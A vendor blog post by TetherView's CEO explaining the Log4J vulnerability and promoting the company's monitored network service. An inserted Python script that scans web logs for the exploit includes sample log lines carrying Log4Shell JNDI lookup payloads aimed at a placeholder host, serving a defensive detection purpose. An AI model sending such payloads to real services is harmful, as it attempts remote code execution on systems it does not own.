Is Log4J Even Worse than You Think? Probably…

The Log4J Shell is being called the worst security vulnerability in a decade. When you dig into the details…it’s actually even worse than it sounds. 

By Michael Abboud, Chief Executive Officer, TetherView

Since its discovery in early December, Log4J has known no shortage of headlines. If cyber risk had an annual award ceremony, this thing would take home every trophy. Yet, despite all the headlines, few people outside of the cybersecurity arena seem to recognize the magnitude of the problem. Don’t get me wrong, people are spooked and taking action to patch their networks. What many don’t realize, however, is that the fallout from Log4J has the potential to stay with us for…years to come. To understand why, you first have to understand what Log4J actually is.

What is Log4J?

Log4J is an extremely popular logging library on the Java computing platform. In layman’s terms, “logging” refers to the communications between a computing system and the users of that system. In the simplest terms, it’s the act of “keeping a log.”

The vulnerability in the Log4J logging library affects code that parses and logs user-controlled data. To carry out an attack, hackers query services and attempt to trigger a log message like a 404 error. However, embedded in the hacker’s query is maliciously crafted code, which Log4J processes as instructions, bringing the malicious code directly (and without raising suspicion) into the network. Through this process, hackers can easily breach corporate networks and take over.
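Defenders can look for these queries in web server logs. The Python below is an added example, not code from this article or from TetherView: it scans access-log lines for Log4j 2's `${...}` lookup syntax (the form the crafted input takes, which the article does not spell out) in client-controlled fields, URL-decoding them first. The log lines, IP addresses and hostnames are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip - - [time] "request" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Log4j 2 lookup syntax starts with "${". Any occurrence in a client-supplied
# field is suspicious, whatever lookup name follows it.
LOOKUP_RE = re.compile(r'\$\{[^}\s]*')

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so %24%7B and %2524%257B both become '${'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_lookup_attempts(lines):
    """Return (ip, status, field, token) for each client field holding '${'."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip it rather than guess
        for field in ("request", "referer", "agent"):
            token = LOOKUP_RE.search(decode_fully(m.group(field)))
            if token:
                hits.append((m.group("ip"), int(m.group("status")),
                             field, token.group(0)))
    return hits

# Constructed sample lines (documentation IP ranges, .invalid hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Dec/2021:10:01:05 +0000] "GET /missing HTTP/1.1" 404 0 "-" "${jndi:ldap://example.invalid/x}"',
    '203.0.113.9 - - [12/Dec/2021:10:01:09 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
]

if __name__ == "__main__":
    for hit in find_lookup_attempts(SAMPLE_LOG):
        print(hit)
```

A hit shows that someone sent the crafted input, not that the application logged it with a vulnerable Log4J; treat it as a lead for checking the hosts behind that endpoint.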

Now here’s the real kicker. I said earlier that Log4J was “widely used.” Exactly how widely used is Log4J? Estimates show that Log4J has been downloaded more than 400,000 times. Logging is a critical part of computing, and because the Log4J library is used by most web services in the world (Amazon, MS Azure, Cisco, VMware, Dell, Citrix, etc.), it means most web services are vulnerable. In the days after the Log4J vulnerability was discovered, there were more than 3.7 million hacking attempts to exploit the vulnerability…that we know about.

While the bigger corporations used their resources to immediately spring into action and patch their networks, the threat now is that hackers will start to target less-resourced small and medium-sized businesses. Small and medium-sized businesses are also the most likely to have their workforce working from personal devices, which can make a corporate network even more susceptible to the Log4J vulnerability. We can help.

This is Why TetherView Exists

Since the announcement of the breach, I’ve been asked by countless business leaders, “Mike, what could I have done to be better prepared?”

Run your network through our Digital Bunker. 

There really isn’t anything else for me to say. TetherView was built for exactly this purpose. We assume there will always be vulnerabilities for hackers to exploit…and we close your network so there is only one way in, and one way out. And when you partner with TetherView, someone is always keeping an eye on your network. We provide real-time, fully staffed monitoring. TetherView combines great technology with great people. When threats are identified, we can quickly mitigate and monitor for any vulnerability. When something like Log4J happens, this means we can easily monitor all activity and focus directly on the area of vulnerability in your network.

SolarWinds. Log4J. Hackers are going to keep finding ways to come at your network. Let us help you keep them out.